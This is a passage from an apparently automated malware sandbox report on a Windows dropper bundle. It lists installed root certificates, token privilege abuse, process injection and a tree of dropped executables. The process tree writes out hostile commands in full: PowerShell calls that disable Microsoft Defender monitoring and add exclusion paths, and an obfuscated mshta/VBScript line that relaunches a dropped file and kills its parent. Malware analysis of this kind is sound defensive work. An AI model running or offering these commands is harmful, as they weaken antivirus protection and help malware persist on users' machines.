c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2024 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4288 powershell.exe 4288 powershell.exe 3752 powershell.exe 3752 powershell.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 2024 PING.EXE 2024 PING.EXE 2024 PING.EXE 2024 PING.EXE 2024 PING.EXE 2024 PING.EXE 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 2024 PING.EXE 2024 PING.EXE 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 2024 PING.EXE 2024 PING.EXE 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 2024 PING.EXE 2024 PING.EXE 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 2024 PING.EXE 2024 PING.EXE 2024 PING.EXE 2024 PING.EXE 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 2024 PING.EXE 2024 PING.EXE 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 2024 PING.EXE 1564 Tue09c257807a702a4.exe 2024 PING.EXE 1564 Tue09c257807a702a4.exe 2024 PING.EXE 2024 PING.EXE 2024 PING.EXE 1564 Tue09c257807a702a4.exe 2024 PING.EXE 1564 Tue09c257807a702a4.exe 2024 PING.EXE 2024 PING.EXE 2024 PING.EXE 2024 PING.EXE 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe 1564 Tue09c257807a702a4.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3220 Explorer.EXE 7508 foldershare.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 5752 1hR0WedLFCi2ffiQp2FL4Pi2.exe 5752 1hR0WedLFCi2ffiQp2FL4Pi2.exe 5752 1hR0WedLFCi2ffiQp2FL4Pi2.exe 1436 cmd.exe 1436 cmd.exe 6704 nvqVMx4So_nVmBVhfMm_C75A.exe 5508 177C.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 32 IoCs
pid Process 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe 6876 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1164 svchost.exe Token: SeCreatePagefilePrivilege 1164 svchost.exe Token: SeShutdownPrivilege 1164 svchost.exe Token: SeCreatePagefilePrivilege 1164 svchost.exe Token: SeShutdownPrivilege 1164 svchost.exe Token: SeCreatePagefilePrivilege 1164 svchost.exe Token: SeShutdownPrivilege 2156 svchost.exe Token: SeCreatePagefilePrivilege 2156 svchost.exe Token: SeDebugPrivilege 3752 powershell.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeDebugPrivilege 5056 Tue0978af55b9.exe Token: SeCreateTokenPrivilege 5132 Tue0971aafeebb6f.exe Token: SeAssignPrimaryTokenPrivilege 5132 Tue0971aafeebb6f.exe Token: SeLockMemoryPrivilege 5132 Tue0971aafeebb6f.exe Token: SeIncreaseQuotaPrivilege 5132 Tue0971aafeebb6f.exe Token: SeMachineAccountPrivilege 5132 Tue0971aafeebb6f.exe Token: SeTcbPrivilege 5132 Tue0971aafeebb6f.exe Token: SeSecurityPrivilege 5132 Tue0971aafeebb6f.exe Token: SeTakeOwnershipPrivilege 5132 Tue0971aafeebb6f.exe Token: SeLoadDriverPrivilege 5132 Tue0971aafeebb6f.exe Token: SeSystemProfilePrivilege 5132 Tue0971aafeebb6f.exe Token: SeSystemtimePrivilege 5132 Tue0971aafeebb6f.exe Token: SeProfSingleProcessPrivilege 5132 Tue0971aafeebb6f.exe Token: SeIncBasePriorityPrivilege 5132 Tue0971aafeebb6f.exe Token: SeCreatePagefilePrivilege 5132 Tue0971aafeebb6f.exe Token: SeCreatePermanentPrivilege 5132 Tue0971aafeebb6f.exe Token: SeBackupPrivilege 5132 Tue0971aafeebb6f.exe Token: SeRestorePrivilege 5132 Tue0971aafeebb6f.exe Token: SeShutdownPrivilege 5132 Tue0971aafeebb6f.exe Token: SeDebugPrivilege 5132 Tue0971aafeebb6f.exe Token: SeAuditPrivilege 5132 Tue0971aafeebb6f.exe Token: SeSystemEnvironmentPrivilege 5132 Tue0971aafeebb6f.exe Token: SeChangeNotifyPrivilege 5132 Tue0971aafeebb6f.exe Token: SeRemoteShutdownPrivilege 5132 Tue0971aafeebb6f.exe Token: SeUndockPrivilege 5132 Tue0971aafeebb6f.exe Token: SeSyncAgentPrivilege 5132 Tue0971aafeebb6f.exe Token: SeEnableDelegationPrivilege 5132 Tue0971aafeebb6f.exe Token: SeManageVolumePrivilege 5132 Tue0971aafeebb6f.exe Token: SeImpersonatePrivilege 5132 Tue0971aafeebb6f.exe Token: SeCreateGlobalPrivilege 5132 Tue0971aafeebb6f.exe Token: 31 5132 Tue0971aafeebb6f.exe Token: 32 5132 Tue0971aafeebb6f.exe Token: 33 5132 Tue0971aafeebb6f.exe Token: 34 5132 Tue0971aafeebb6f.exe Token: 35 5132 Tue0971aafeebb6f.exe Token: SeDebugPrivilege 1500 mb2UC8iI_0pul48ZjDuP1Fip.exe Token: SeRestorePrivilege 5936 WerFault.exe Token: SeBackupPrivilege 5936 WerFault.exe Token: SeBackupPrivilege 5936 WerFault.exe Token: SeDebugPrivilege 6056 taskkill.exe Token: SeCreateTokenPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeAssignPrimaryTokenPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeLockMemoryPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeIncreaseQuotaPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeMachineAccountPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeTcbPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeSecurityPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeTakeOwnershipPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeLoadDriverPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeSystemProfilePrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeSystemtimePrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeProfSingleProcessPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeIncBasePriorityPrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe Token: SeCreatePagefilePrivilege 1352 POhZnp_zz8JHALLWt8sLBpym.exe -
Suspicious use of FindShellTrayWindow 63 IoCs
pid Process 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 5756 Tue0990c8b597f.tmp 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 6496 Altrove.exe.com 6496 Altrove.exe.com 6496 Altrove.exe.com 1752 run2.exe 1752 run2.exe 6876 msedge.exe 2092 setup.tmp 6896 installer.exe 10904 Calculator.exe -
Suspicious use of SendNotifyMessage 57 IoCs
pid Process 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 904 Tue0947ef38552fc.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 1752 run2.exe 6496 Altrove.exe.com 6496 Altrove.exe.com 6496 Altrove.exe.com 1752 run2.exe 1752 run2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2232 wrote to memory of 2500 2232 setup_x86_x64_install.exe 84 PID 2232 wrote to memory of 2500 2232 setup_x86_x64_install.exe 84 PID 2232 wrote to memory of 2500 2232 setup_x86_x64_install.exe 84 PID 2500 wrote to memory of 1780 2500 setup_installer.exe 85 PID 2500 wrote to memory of 1780 2500 setup_installer.exe 85 PID 2500 wrote to memory of 1780 2500 setup_installer.exe 85 PID 2156 wrote to memory of 1516 2156 svchost.exe 88 PID 2156 wrote to memory of 1516 2156 svchost.exe 88 PID 1780 wrote to memory of 3196 1780 setup_install.exe 91 PID 1780 wrote to memory of 3196 1780 setup_install.exe 91 PID 1780 wrote to memory of 3196 1780 setup_install.exe 91 PID 1780 wrote to memory of 4040 1780 setup_install.exe 92 PID 1780 wrote to memory of 4040 1780 setup_install.exe 92 PID 1780 wrote to memory of 4040 1780 setup_install.exe 92 PID 1780 wrote to memory of 5080 1780 setup_install.exe 93 PID 1780 wrote to memory of 5080 1780 setup_install.exe 93 PID 1780 wrote to memory of 5080 1780 setup_install.exe 93 PID 1780 wrote to memory of 3028 1780 setup_install.exe 94 PID 1780 wrote to memory of 3028 1780 setup_install.exe 94 PID 1780 wrote to memory of 3028 1780 setup_install.exe 94 PID 1780 wrote to memory of 832 1780 setup_install.exe 95 PID 1780 wrote to memory of 832 1780 setup_install.exe 95 PID 1780 wrote to memory of 832 1780 setup_install.exe 95 PID 1780 wrote to memory of 3668 1780 setup_install.exe 96 PID 1780 wrote to memory of 3668 1780 setup_install.exe 96 PID 1780 wrote to memory of 3668 1780 setup_install.exe 96 PID 1780 wrote to memory of 3416 1780 setup_install.exe 100 PID 1780 wrote to memory of 3416 1780 setup_install.exe 100 PID 1780 wrote to memory of 3416 1780 setup_install.exe 100 PID 4040 wrote to memory of 4288 4040 cmd.exe 99 PID 4040 wrote to memory of 4288 4040 cmd.exe 99 PID 4040 wrote to memory of 4288 4040 cmd.exe 99 PID 3196 wrote to memory of 3752 3196 cmd.exe 98 PID 3196 wrote to memory of 3752 3196 cmd.exe 98 PID 3196 wrote to memory of 3752 3196 cmd.exe 98 PID 1780 wrote to memory of 4016 1780 setup_install.exe 97 PID 1780 wrote to memory of 4016 1780 setup_install.exe 97 PID 1780 wrote to memory of 4016 1780 setup_install.exe 97 PID 1780 wrote to memory of 5076 1780 setup_install.exe 102 PID 1780 wrote to memory of 5076 1780 setup_install.exe 102 PID 1780 wrote to memory of 5076 1780 setup_install.exe 102 PID 1780 wrote to memory of 2216 1780 setup_install.exe 101 PID 1780 wrote to memory of 2216 1780 setup_install.exe 101 PID 1780 wrote to memory of 2216 1780 setup_install.exe 101 PID 3028 wrote to memory of 1564 3028 cmd.exe 105 PID 3028 wrote to memory of 1564 3028 cmd.exe 105 PID 3028 wrote to memory of 1564 3028 cmd.exe 105 PID 5080 wrote to memory of 1500 5080 cmd.exe 104 PID 5080 wrote to memory of 1500 5080 cmd.exe 104 PID 3668 wrote to memory of 5056 3668 cmd.exe 106 PID 3668 wrote to memory of 5056 3668 cmd.exe 106 PID 1780 wrote to memory of 1268 1780 setup_install.exe 103 PID 1780 wrote to memory of 1268 1780 setup_install.exe 103 PID 1780 wrote to memory of 1268 1780 setup_install.exe 103 PID 3416 wrote to memory of 2628 3416 cmd.exe 107 PID 3416 wrote to memory of 2628 3416 cmd.exe 107 PID 3416 wrote to memory of 2628 3416 cmd.exe 107 PID 1780 wrote to memory of 3316 1780 setup_install.exe 108 PID 1780 wrote to memory of 3316 1780 setup_install.exe 108 PID 1780 wrote to memory of 3316 1780 setup_install.exe 108 PID 4016 wrote to memory of 2996 4016 cmd.exe 110 PID 4016 wrote to memory of 2996 4016 cmd.exe 110 PID 4016 wrote to memory of 2996 4016 cmd.exe 110 PID 1780 wrote to memory of 3464 1780 setup_install.exe 109
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3220 -
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0985edbf92e08954.exe5⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0985edbf92e08954.exeTue0985edbf92e08954.exe6⤵
- Executes dropped EXE
PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c257807a702a4.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c257807a702a4.exeTue09c257807a702a4.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1564 -
C:\Users\Admin\Pictures\Adobe Films\8wixEKYkU3LAxAJFOjsTzj6U.exe"C:\Users\Admin\Pictures\Adobe Films\8wixEKYkU3LAxAJFOjsTzj6U.exe"7⤵
- Executes dropped EXE
PID:5732
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"7⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of SetThreadContext
PID:4264 -
C:\Users\Admin\AppData\Local\Temp\51ecad6f-8e20-45c6-87e3-c54a71f85ec3\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\51ecad6f-8e20-45c6-87e3-c54a71f85ec3\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\51ecad6f-8e20-45c6-87e3-c54a71f85ec3\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵PID:6892
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"8⤵PID:1036
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe" -Force8⤵PID:4560
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"8⤵PID:6284
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1phdChzdGYsbzdQSL7S8qbXG.exe"C:\Users\Admin\Pictures\Adobe Films\1phdChzdGYsbzdQSL7S8qbXG.exe"7⤵
- Executes dropped EXE
PID:828
-
-
C:\Users\Admin\Pictures\Adobe Films\NLSKXAzQFqcD5othJip8lEJV.exe"C:\Users\Admin\Pictures\Adobe Films\NLSKXAzQFqcD5othJip8lEJV.exe"7⤵
- Executes dropped EXE
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:6392 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"9⤵PID:6432
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"9⤵PID:7056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 28010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9000
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhangm-game.exe"C:\Users\Admin\AppData\Local\Temp\zhangm-game.exe"9⤵PID:6784
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"9⤵PID:4060
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:1648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:792
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:5588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"12⤵
- Kills process with taskkill
PID:8032
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵PID:6776
-
